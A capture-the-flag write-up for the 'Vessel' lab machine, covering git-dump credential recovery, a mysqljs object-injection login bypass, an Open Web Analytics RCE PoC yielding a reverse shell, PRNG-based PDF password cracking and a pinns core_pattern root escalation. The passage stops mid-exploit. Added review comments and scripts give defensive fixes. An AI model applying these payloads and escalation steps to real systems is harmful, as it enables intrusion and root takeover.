Tracks-cloud-Vessel


nmap

└─$ sudo nmap -sS 10.10.11.178 -p- --min-rate=3000                                                                                   

Nmap scan report for 10.10.11.178
Host is up (0.29s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

User

TCP 80/web

The only functional page on port 80 is the login page.

There is also a contact page, but it does not send any requests.

The login page offers registration and password reset; registration cannot be used either, it goes straight to an error page.

Directory scan

└─$ dirsearch -u http://10.10.11.178

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Target: http://10.10.11.178/

[04:23:30] Starting:
[04:23:38] 301 - 171B - /js -> /js/
[04:24:07] 200 - 797B - /404
[04:24:07] 200 - 778B - /401
[04:24:07] 200 - 758B - /500
[04:24:18] 302 - 28B - /Admin -> /login
[04:24:18] 302 - 28B - /ADMIN -> /login
[04:24:18] 302 - 28B - /admin -> /login
[04:24:20] 302 - 28B - /Admin/ -> /login
[04:24:20] 302 - 28B - /admin/ -> /login
[04:25:12] 301 - 173B - /css -> /css/
[04:25:16] 301 - 173B - /dev -> /dev/
[04:25:30] 301 - 173B - /img -> /img/
[04:25:35] 200 - 329B - /js/
[04:25:38] 200 - 4KB - /login
[04:25:39] 200 - 4KB - /login/
[04:25:40] 302 - 28B - /logout -> /login
[04:25:40] 302 - 28B - /logout/ -> /login
[04:26:03] 200 - 1KB - /register
[04:26:04] 200 - 4KB - /reset
[04:26:08] 403 - 277B - /server-status/
[04:26:08] 403 - 277B - /server-status

Trying each path in turn: /js has directory listing enabled, but there is nothing useful in it.

The /dev path from the scan looked the most suspicious, so I scanned it further.

└─$ dirsearch -u http://10.10.11.178/dev

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460


Target: http://10.10.11.178/

[04:41:34] Starting: dev/
[04:41:43] 200 - 139B - /dev/.git/config
[04:41:43] 200 - 25B - /dev/.git/COMMIT_EDITMSG
[04:41:43] 200 - 73B - /dev/.git/description
[04:41:43] 200 - 23B - /dev/.git/HEAD
[04:41:44] 200 - 3KB - /dev/.git/index
[04:41:44] 301 - 203B - /dev/.git/logs/refs -> /dev/.git/logs/refs/
[04:41:44] 200 - 240B - /dev/.git/info/exclude
[04:41:44] 200 - 5KB - /dev/.git/logs/HEAD
[04:41:44] 301 - 215B - /dev/.git/logs/refs/heads -> /dev/.git/logs/refs/heads/
[04:41:44] 200 - 2KB - /dev/.git/logs/refs/heads/master
[04:41:44] 301 - 205B - /dev/.git/refs/heads -> /dev/.git/refs/heads/
[04:41:44] 200 - 41B - /dev/.git/refs/heads/master
[04:41:44] 301 - 203B - /dev/.git/refs/tags -> /dev/.git/refs/tags/

That is an exposed .git directory; dump it with git-dumper.

gitdump

python3.11 ~/tools/git-dumper/git_dumper.py http://10.10.11.178/dev/ ./dev

Go through the git log:

└─$ git log                               
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date: Mon Aug 22 10:11:34 2022 -0400

Potential security fixes

commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date: Fri Aug 12 14:19:19 2022 -0400

Security Fixes

commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date: Wed Aug 10 15:16:56 2022 -0400

Initial commit

Two updates in total. The initial commit adds config/db.js, which contains the database password:

└─$ git show f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date: Wed Aug 10 15:16:56 2022 -0400

Initial commit

diff --git a/config/db.js b/config/db.js
new file mode 100644
index 0000000..5fc0bbd
--- /dev/null
+++ b/config/db.js
@@ -0,0 +1,11 @@
+var mysql = require('mysql');
+
+var connection = {
+ db: {
+ host : 'localhost',
+ user : 'default',
+ password : 'daqvACHKvRn84VdVp',
+ database : 'vessel'
+}};
+
+module.exports = connection;
\ No newline at end of file
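
Review bot: the new config/db.js commits a live database password (password : 'daqvACHKvRn84VdVp') to the repository; once committed it stays recoverable from history even after the file is changed, which is exactly how it was recovered here. Read it from the environment instead (password : process.env.DB_PASSWORD), keep config/db.js out of the tree via .gitignore, and rotate the credential.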

The first update fixed a SQL injection in the login route:

└─$ git show edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date: Fri Aug 12 14:19:19 2022 -0400

Security Fixes

diff --git a/routes/index.js b/routes/index.js
index be2adb1..0cf479c 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -61,7 +61,7 @@ router.post('/api/login', function(req, res) {
let username = req.body.username;
let password = req.body.password;
if (username && password) {
- connection.query("SELECT * FROM accounts WHERE username = '" + username + "' AND password = '" + password + "'", function(error, results, fields) {
+ connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields) {
if (error) throw error;
if (results.length > 0) {
req.session.loggedin = true;
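
Review bot: the parameterised query on the + line is not sufficient on its own, because username and password come straight from req.body (let username = req.body.username;) and are not guaranteed to be strings; when the bound value is an object the driver expands it into `key` = value instead of a quoted literal, which rewrites the WHERE clause. Extend the guard to if (username && password && typeof username === 'string' && typeof password === 'string') before the query. Two smaller points on the same lines: the password is still compared in plaintext inside SQL, so a hashed comparison in application code would be the stronger fix, and if (error) throw error; inside the callback will take the process down on any query error.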

The most recent commit touches the database module; it shows the app uses mysqljs (the npm mysql package):

└─$ git show 208167e785aae5b052a4a2f9843d74e733fbd917
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date: Mon Aug 22 10:11:34 2022 -0400

Potential security fixes

diff --git a/routes/index.js b/routes/index.js
index 0cf479c..69c22be 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -1,6 +1,6 @@
var express = require('express');
var router = express.Router();
-var mysql = require('mysql');
+var mysql = require('mysql'); /* Upgraded deprecated mysqljs */
var flash = require('connect-flash');
var db = require('../config/db.js');
var connection = mysql.createConnection(db.db)
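
Review bot: the only change in this hunk is the comment /* Upgraded deprecated mysqljs */; the require('mysql') line itself is unchanged and no package manifest change is part of the diff, so nothing here shows that an upgrade actually happened. The version bump in package.json / the lock file belongs in the same commit, otherwise the comment is misleading.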

The git config holds no leftover credentials:

└─$ cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
name = Ethan
email = ethan@vessel.htb
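
Reading each commit with git show is fine for three commits; for a longer dumped history it is easier to scan the whole git log -p output for credential-like assignments. The script below is an added example (not from this writeup or the vessel repository): it walks patch text, tracks the current commit, file and new-file line number, and reports added lines that assign a quoted value to a password/secret/token-style key. The embedded sample log is constructed from the db.js hunk above; the hash of the second sample commit is a placeholder.

```python
import re
import subprocess
import sys

# Added example, not part of the writeup: scan `git log -p` output for secrets
# introduced in added lines, so a dumped history is checked in one pass.

# Key = 'value' or key: "value" with a value of at least six characters.
SECRET_KEYS = re.compile(
    r"""(?i)\b(password|passwd|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*['"]([^'"]{6,})['"]"""
)

# Constructed sample modelled on the db.js hunk above (second commit hash is a placeholder).
SAMPLE_LOG = """\
commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>

    Initial commit

diff --git a/config/db.js b/config/db.js
--- /dev/null
+++ b/config/db.js
@@ -0,0 +1,11 @@
+var mysql = require('mysql');
+var connection = {
+ db: {
+ host : 'localhost',
+ user : 'default',
+ password : 'daqvACHKvRn84VdVp',
+ database : 'vessel'
+}};
+module.exports = connection;
commit 0000000000000000000000000000000000000000
Author: Ethan <ethan@vessel.htb>

    Security Fixes

diff --git a/routes/index.js b/routes/index.js
--- a/routes/index.js
+++ b/routes/index.js
@@ -61,7 +61,7 @@
-    connection.query("SELECT * FROM accounts WHERE username = '" + username + "'", cb);
+    connection.query('SELECT * FROM accounts WHERE username = ?', [username], cb);
"""


def scan_git_log(text):
    """Return (commit, path, new_line_no, key, value) for each added line holding a literal secret."""
    commit = path = None
    in_hunk = False
    new_line = 0
    hits = []
    for line in text.splitlines():
        if line.startswith("commit ") or line.startswith("diff --git "):
            in_hunk = False
            if line.startswith("commit "):
                commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
        elif line.startswith("@@ "):
            in_hunk = True
            new_line = int(re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", line).group(1))
        elif in_hunk and line.startswith("+"):
            m = SECRET_KEYS.search(line[1:])
            if m:
                hits.append((commit, path, new_line, m.group(1).lower(), m.group(2)))
            new_line += 1
        elif in_hunk and line.startswith("-"):
            pass                      # removed lines occupy no line in the new file
        elif in_hunk:
            new_line += 1             # unchanged context line
    return hits


if __name__ == "__main__":
    # Usage: python3 scan_history.py ./dev   (a directory dumped with git-dumper)
    repo = sys.argv[1] if len(sys.argv) > 1 else "."
    log = subprocess.run(["git", "-C", repo, "log", "-p", "--all", "--no-color"],
                         capture_output=True, text=True, check=True).stdout
    for commit, path, lineno, key, value in scan_git_log(log):
        print(f"{commit[:12]} {path}:{lineno} {key} = {value}")
```

Only added lines are reported, so a secret that was later removed still shows up under the commit that introduced it; that is the point, since the removal does not purge it from the history an attacker dumps.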

mysqljs injection

Although the SQL injection looks fixed, searching for the keyword mysqljs turns up this article on bypassing the escape functions in mysqljs/mysql:

https://flatt.tech/research/posts/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql/

connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields)

The express body parser does not guarantee a string: with extended URL-encoded parsing, a key such as password[password] is decoded into an object, so the value bound to the placeholder can be a type other than a string.

mysqljs escapes an object by expanding it into `key` = value pairs rather than into a quoted string. Sending password[password]=1 therefore turns the condition into password = `password` = 1, which the database evaluates as (password = password) = 1, i.e. true.

Passing an object this way gives control over the outcome of the comparison, and the login succeeds without knowing the password.

Put the returned session cookie into a cookie editor, otherwise the redirect does not carry the cookie and the session check fails.
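
To make the bypass concrete, here is an added example (written for this page, not code from the vessel app or from the mysql npm package): a Python port of the pieces of mysqljs's SqlString.escape()/format() that matter here, together with a one-level imitation of express.urlencoded({extended: true}) body parsing. Both ports are assumptions about those libraries' behaviour, following their documented escaping and parsing rules. It shows the normal query, why a quote-based payload fails, why password[password]=1 rewrites the WHERE clause, and the type check that closes the hole.

```python
import re
from urllib.parse import parse_qsl

# Added example: Python port of the relevant parts of mysqljs's SqlString
# (assumption about the library's behaviour) plus a minimal extended
# urlencoded parser, used to show the object-value bypass.

LOGIN_SQL = "SELECT * FROM accounts WHERE username = ? AND password = ?"

_ESCAPES = {"\0": "\\0", "\b": "\\b", "\t": "\\t", "\n": "\\n", "\r": "\\r",
            "\x1a": "\\Z", '"': '\\"', "'": "\\'", "\\": "\\\\"}


def escape_string(s):
    """String escaping: backslash-escape the dangerous characters and wrap in single quotes."""
    return "'" + "".join(_ESCAPES.get(c, c) for c in s) + "'"


def escape_id(name):
    """Identifier escaping: backticks, with inner backticks doubled."""
    return "`" + name.replace("`", "``") + "`"


def escape(value):
    """Port of sqlstring.escape for the JS types a body parser can produce."""
    if value is None:
        return "NULL"
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    if isinstance(value, str):
        return escape_string(value)
    if isinstance(value, list):                    # arrays become a comma-separated list
        return ", ".join(escape(v) for v in value)
    if isinstance(value, dict):                    # objects become `key` = value pairs
        return ", ".join(f"{escape_id(k)} = {escape(v)}" for k, v in value.items())
    raise TypeError(f"unsupported type {type(value).__name__}")


def format_query(sql, params):
    """sqlstring.format: substitute each ? with the escaped next parameter."""
    params = list(params)
    return re.sub(r"\?", lambda _m: escape(params.pop(0)), sql)


def parse_extended_body(raw):
    """One-level imitation of extended urlencoded parsing: a[b]=c -> {'a': {'b': 'c'}}."""
    body = {}
    for key, value in parse_qsl(raw, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            body.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            body[key] = value
    return body


def build_login_query(body):
    """What the vulnerable route sends: placeholders bound straight from req.body."""
    return format_query(LOGIN_SQL, [body.get("username"), body.get("password")])


def build_login_query_safe(body):
    """Hardened version: refuse anything that is not a plain string before binding it."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    return format_query(LOGIN_SQL, [username, password])


if __name__ == "__main__":
    for raw in ("username=admin&password=secret",
                "username=admin&password=%27%20OR%201%3D1--",
                "username=admin&password[password]=1"):
        print(raw, "->", build_login_query(parse_extended_body(raw)))
```

The middle case shows why the classic quote payload is harmless: the quote is escaped inside the literal. The object case never goes through string escaping at all, which is why the fix has to be a type check (or a schema validator) in front of the query rather than more escaping.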

dashboard

Login redirects to the dashboard.

The page has very few usable features; the analytics link in the top right corner leads to another subdomain:

openwebanalytics.vessel.htb

Add it to /etc/hosts and open it.

openwebanalytics OWA

It is an Open Web Analytics (OWA) instance.

Searching for known vulnerabilities turns up CVE-2022-24637, which gives direct RCE:

https://www.exploit-db.com/exploits/51026

So the PoC can be used directly.

CVE-2022-24637 get www-data

First run the PoC's check mode to confirm the vulnerability:

└─$ python3 owa.py  -c openwebanalytics.vessel.htb 10.10.16.14 10086
[SUCCESS] Connected to "http://openwebanalytics.vessel.htb/" successfully!
[ALERT] The webserver indicates a vulnerable version!
[INFO] Attempting to generate cache for "admin" user
[INFO] Attempting to find cache of "admin" user
[INFO] Found temporary password for user "admin": e8ffbc115fedd34e19da20ed4f4b6fd1
[ALERT] The system appears to be vulnerable!

Then run the PoC to get a reverse shell:

└─$ python3 owa.py   openwebanalytics.vessel.htb 10.10.16.14 10086 
[SUCCESS] Connected to "http://openwebanalytics.vessel.htb/" successfully!
[ALERT] The webserver indicates a vulnerable version!
[INFO] Attempting to generate cache for "admin" user
[INFO] Attempting to find cache of "admin" user
[INFO] Found temporary password for user "admin": e8ffbc115fedd34e19da20ed4f4b6fd1
[INFO] Changed the password of "admin" to "CF0ai18FJlFiV4mNJx9AV5dnohPwvMun"
[SUCCESS] Logged in as "admin" user
[INFO] Creating log file
[INFO] Wrote payload to log file
[SUCCESS] Triggering payload! Check your listener!
[INFO] You can trigger the payload again at "http://openwebanalytics.vessel.htb/owa-data/caches/iGQiN1kD.php"

Shell obtained:

└─$ nc -lnvp 10086            
listening on [any] 10086 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.11.178] 47212
whoami
www-data

www-data to User

The database credentials for the port-80 app came from git, so the first step is to connect to that database and look around:

mysql -u default -p -D vessel

# password: daqvACHKvRn84VdVp

This user can only access the vessel database; it contains a password for admin:

mysql> select * from accounts;
+----+----------+----------------------------------+------------------+
| id | username | password | email |
+----+----------+----------------------------------+------------------+
| 1 | admin | k>N4Hf6TmHE(W]Uq"(RCj}V>&=rB$4}< | admin@vessel.htb |
+----+----------+----------------------------------+------------------+
1 row in set (0.00 sec)

But that password does not log in anywhere.

OWA db

There are two web apps, so look at OWA's database as well. Grepping the web root for the MySQL port number finds the config file:

www-data@vessel:/var/www$ grep '3306' ./* -r           
./html/vessel/node_modules/async/README.md:Check out [this animation](https://camo.githubusercontent.com/6bbd36f4cf5b35a0f11a96dcd2e97711ffc2fb37/68747470733a2f2f662e636c6f75642e6769746875622e636f6d2f6173736574732f313637363837312f36383130382f62626330636662302d356632392d313165322d393734662d3333393763363464633835382e676966) for how `cargo` and `queue` work.
./html/vessel/node_modules/mysql/Readme.md:* `port`: The port number to connect to. (Default: `3306`)
./html/vessel/node_modules/mysql/Readme.md:For example, if you have an installation of mysql running on localhost:3306
./html/vessel/node_modules/mysql/Readme.md:$ MYSQL_HOST=localhost MYSQL_PORT=3306 MYSQL_DATABASE=node_mysql_test MYSQL_USER=root MYSQL_PASSWORD= FILTER=integration npm test
./html/vessel/node_modules/mysql/lib/ConnectionConfig.js: this.port = options.port || 3306;
./html/owa/plugins/db/owa_db_mysql.php: $port = 3306;
./html/owa/modules/base/classes/installController.php: owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/classes/settings.php: 'db_port' => 3306,
./html/owa/modules/base/classes/settings.php: fwrite($handle, str_replace("3306", $config_values['db_port'], $line));
./html/owa/modules/base/classes/installManager.php: owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/updates/004.php: owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/templates/install_config_entry.php: <input type="text"size="30" name="<?php echo $this->getNs();?>db_port" value="<?php echo ($config['db_port'] ? $config['db_port'] : 3306);?>">
./html/owa/modules/base/templates/install_config_entry.php: <span class="form-instructions">(optional) The port of your database. Will default to port 3306 if you leave this empty.</span>
./html/owa/conf/messages.php: 3306 => ['headline' => 'Error', 'message' => 'User id already exists for some reason.'],
./html/owa/owa-config.php:define('OWA_DB_PORT', '3306'); // port of database

It contains a database password:

...
www-data@vessel:/var/www$ cat ./html/owa/owa-config.php
define('OWA_DB_TYPE', 'mysql'); // options: mysql
define('OWA_DB_NAME', 'owa'); // name of the database
define('OWA_DB_HOST', 'localhost'); // host name of the server housing the database
define('OWA_DB_USER', 'owauser'); // database user
define('OWA_DB_PORT', '3306'); // port of database
define('OWA_DB_PASSWORD', 'Vux8*ZF3rek94%NW'); // database user's password
...

Connect and query it:

mysql> select * from owa_user\G;
*************************** 1. row ***************************
id: 1
user_id: admin
password: $2y$10$MBm4qLJu8PynsUalqLhK9ueAKBXSD6vS5he/hWuUqrZZf389ID/ay
role: admin
real_name: default admin
email_address: admin@vessel.htb
temp_passkey: 1d90278ef04d2fbcb5476f2fd5ba3518
creation_date: 1650211659
last_update_date: 1650211659
api_key: a390cc0247ecada9a2b8d2338b9ca6d2
1 row in set (0.00 sec)

The bcrypt hash does not crack at all, so keep enumerating the environment.

steven home dir

steven's home directory is unusually permissive:

www-data@vessel:/home$ ls
total 16K
drwx------ 5 ethan ethan 4.0K Aug 11 2022 ethan
drwxrwxr-x 3 steven steven 4.0K Aug 11 2022 steven

Inside it there is a 33M passwordGenerator binary and a .notes folder containing a PDF and an image:

www-data@vessel:/home/steven$ ls
total 34M
drwxr-xr-x 2 ethan steven 4.0K Aug 11 2022 .notes
drwxrwxr-x 3 steven steven 4.0K Aug 11 2022 .
drwxr-xr-x 4 root root 4.0K Aug 11 2022 ..
-rw-r--r-- 1 ethan steven 33M May 4 2022 passwordGenerator
lrwxrwxrwx 1 root root 9 Apr 18 2022 .bash_history -> /dev/null
-rw------- 1 steven steven 220 Apr 17 2022 .bash_logout
-rw------- 1 steven steven 3.7K Apr 17 2022 .bashrc
-rw------- 1 steven steven 807 Apr 17 2022 .profile

www-data@vessel:/home/steven/.notes$ ls
total 40K
drwxr-xr-x 2 ethan steven 4.0K Aug 11 2022 .
drwxrwxr-x 3 steven steven 4.0K Aug 11 2022 ..
-rw-r--r-- 1 ethan steven 18K Aug 10 2022 notes.pdf
-rw-r--r-- 1 ethan steven 12K May 2 2022 screenshot.png

Pull the files out. The PDF is password protected.

The image looks like a screenshot of the 33M passwordGenerator's GUI, probably taken when the PDF password was generated.

passwordGenerator

The binary turns out to be a Windows executable:

└─$ file passwordGenerator 
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows, 5 sections

It was packed with PyInstaller, so it has to be unpacked again. pyinstxtractor recovers the .pyc files:

└─$ python3 ~/tools/pyinstxtractor/pyinstxtractor.py  ../passwordGenerator 
[+] Processing ../passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.7 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ../passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

pycdc refuses the file, complaining about the version; my local Python is indeed newer than the 3.7 the binary was built with:

└─$ pycdc -c passwordGenerator.pyc -o passwordGenerator.py                
Opening raw code objects requires a version to be specified

So switch to uncompyle6:

└─$ uncompyle6  passwordGenerator.pyc -o passwordGenerator.py 

The main password generation logic from the decompiled output (uncompyle6's control-flow reconstruction is not exact here; what matters is the seeding and the loop):

└─$ cat passwordGenerator.py

....
def genPassword(self):
    length = value
    char = index
    if char == 0:
        charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?"
    else:
        if char == 1:
            charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        else:
            if char == 2:
                charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"
            else:
                try:
                    qsrand(QTime.currentTime().msec())
                    password = ""
                    for i in range(length):
                        idx = qrand() % len(charset)
                        nchar = charset[idx]
                        password += str(nchar)

                except:
                    msg = QMessageBox()
                    msg.setWindowTitle("Error")
                    msg.setText("Error while generating password!, Send a message to the Author!")
                    x = msg.exec_()

    return password

This is a weak PRNG: the seed is QTime.currentTime().msec(), the millisecond part of the current time, which is a value from 0 to 999.

Qt docs for QTime::msec(): "Returns the millisecond part (0 to 999) of the time."

So generating at most 1000 candidates covers every possible seed.

The screenshot shows length 32 and the full character set, so the script uses the same length and charset:

└─$ cat passwordGenerator.py

from PySide2.QtCore import *

def genPassword(num):
    length = 32
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?"
    qsrand(num)                      # seed exactly as the generator does, with the candidate msec value
    password = ""
    for i in range(length):
        idx = qrand() % len(charset)
        nchar = charset[idx]
        password += str(nchar)
    return password

if '__main__' == __name__:
    with open("./wordlist.txt", "a") as ww:
        for i in range(0, 1000):     # QTime.msec() is 0..999, so one candidate per possible seed
            ww.write(genPassword(i) + "\n")

Qt's qsrand()/qrand() are thin wrappers over the platform C runtime, so the same seed does not yield the same password on every OS. The wordlist I first generated on Linux did not crack the PDF; since the screenshot was taken on Windows, I generated the list again on Windows, and the two lists indeed differ.

The Windows wordlist cracked it:

└─$ pdf2john notes.pdf 
notes.pdf:$pdf$2*3*128*-1028*1*16*c19b3bb1183870f00d63a766a1f80e68*32*4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000*32*cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86
└─$ hashcat pdfhash ./pass/wordlist.txt
$pdf$2*3*128*-1028*1*16*c19b3bb1183870f00d63a766a1f80e68*32*4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000*32*cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86:YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS

That gives the PDF password: YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS
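
Rather than switching to a Windows box, the Windows wordlist can be produced anywhere by porting the C-runtime generator that Qt wraps. The following is an added example, not the writeup's script: msvcrt_rand() is a port of the MSVCRT/UCRT rand() linear congruential generator (checked below against the well-known srand(1) output 41, 18467, 6334), and glibc_rand_r() is a port of glibc's rand_r(), which is what Qt 5's qrand() calls on Linux. That the PySide2 build on each platform ends up in exactly these routines is an assumption. Both generate all 1000 candidates, one per possible millisecond seed.

```python
# Added example, not part of the original writeup: the candidate wordlist
# without PySide2, by porting the two C-runtime generators Qt 5's
# qsrand()/qrand() wrap (assumption: MSVCRT rand() on Windows, glibc
# rand_r() on Linux).

CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?"
LENGTH = 32
MASK32 = 0xFFFFFFFF


def msvcrt_rand(seed):
    """MSVCRT/UCRT srand(seed); rand(): 32-bit LCG, each call returns the top 15 bits of the state."""
    state = seed & MASK32
    while True:
        state = (state * 214013 + 2531011) & MASK32
        yield (state >> 16) & 0x7FFF


def glibc_rand_r(seed):
    """glibc rand_r(): three LCG steps per call, folded into a 31-bit result."""
    state = seed & MASK32
    while True:
        state = (state * 1103515245 + 12345) & MASK32
        result = (state >> 16) % 2048
        state = (state * 1103515245 + 12345) & MASK32
        result = (result << 10) ^ ((state >> 16) % 1024)
        state = (state * 1103515245 + 12345) & MASK32
        result = (result << 10) ^ ((state >> 16) % 1024)
        yield result


def gen_password(seed, rng=msvcrt_rand, length=LENGTH, charset=CHARSET):
    """Same loop as the decompiled genPassword(), with the generator swapped in."""
    stream = rng(seed)
    return "".join(charset[next(stream) % len(charset)] for _ in range(length))


def wordlist(rng=msvcrt_rand):
    """All candidates: QTime::msec() is 0..999, so one password per seed."""
    return [gen_password(seed, rng) for seed in range(1000)]


if __name__ == "__main__":
    # Writes wordlist_windows.txt and wordlist_linux.txt for hashcat / john.
    for name, rng in (("windows", msvcrt_rand), ("linux", glibc_rand_r)):
        with open(f"wordlist_{name}.txt", "w") as fh:
            fh.write("\n".join(wordlist(rng)) + "\n")
```

Feed wordlist_windows.txt to hashcat exactly as above; the Linux list is written too so the difference the writeup ran into can be seen directly instead of discovered after a failed crack.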


get User

Unlocking the PDF reveals ethan's password: b@mPRNSVTjjLKId1T

Log in over SSH:

└─$ ssh ethan@10.10.11.178

ethan@vessel:~$ ls
user.txt
ethan@vessel:~$ cat user*
343c1af6c136a6825c1bb5b40cba9dce

Root

pinns set sysctl

While enumerating the box, the SUID binary pinns stands out:

ethan@vessel:/home/steven/.notes$ find / -perm -u=s 2>/dev/null 
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
/usr/bin/pinns
/home/steven/.notes$ ls -alth /usr/bin/pinns
-rwsr-x--- 1 root ethan 796K Mar 15 2022 /usr/bin/pinns

I pulled it down to look at it.

It accepts many flags; the first one I tried produced an error, and the error text was unusual.

Searching for that error shows pinns is not custom: it is the namespace-pinning helper shipped with the CRI-O container runtime.

Searching for exploits leads to this CrowdStrike article:

https://www.crowdstrike.com/en-us/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/

In short, pinns can set kernel sysctl options.

The article describes exploitation in Kubernetes during pod creation, abusing the fact that pinns lets a single value set several kernel parameters joined with +, but the underlying primitive is the same: pinns writes the parameters directly into the host kernel.

image

For example, the value given there is:

"1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"

The part that matters is the kernel.core_pattern assignment at the end:

kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #

Looking up that key:

https://docs.redhat.com/zh-cn/documentation/openshift_container_platform/4.11/html/nodes/nodes-containers-sysctls

https://www.kernel.org/doc/html/v6.3/admin-guide/sysctl/kernel.html#core-pattern

core_pattern tells the kernel what to do with a core dump when a process crashes. If the value starts with |, as in the CrowdStrike article, the kernel pipes the dump to the program named after the |, and that program is started by the kernel as root.

So with the setting below, any process crash on the host runs /home/ethan/test.sh:

pinns -s "kernel.core_pattern=|/home/ethan/test.sh"

Get Root

So the exploitation path is clear:

  • 1. change kernel.core_pattern
  • 2. start a process
  • 3. make it crash, which triggers the malicious script

Change the sysctl first:

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"
[pinns:e]: Path for pinning namespaces not specified: Invalid argument

Path for pinning namespaces not specified: Invalid argument. Searching the decompiled binary for that string shows the missing flag is -d.

Add -d:

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "./"
[pinns:e]: Filename for pinning namespaces not specified: Invalid argument

Next error; this time -f is missing.

Add that too:

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "./" -f "/tmp"
[pinns:e] No namespace specified for pinning

Searching again: the next check requires a counter (v3 in the decompiled output) to be non-zero, and several of the namespace flags increment it, so any one of them will do.

With -c added, the command succeeds:

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "/" -f "aac"  -c 

Check that the setting took effect:

ethan@vessel:~$ cat /proc/sys/kernel/core_pattern
|/home/ethan/test.sh #

Create test.sh. The core handler is started by the kernel as root, so making it set the setuid bit on bash is enough:

ethan@vessel:~$ echo -e '#!/bin/bash\nchmod +s /bin/bash' > test.sh
ethan@vessel:~$ chmod +777 test.sh

Open another terminal and start any process; I used vim:

ethan@vessel:~$ vim test

Find its pid:

ethan@vessel:~$ ps -axuf|grep test
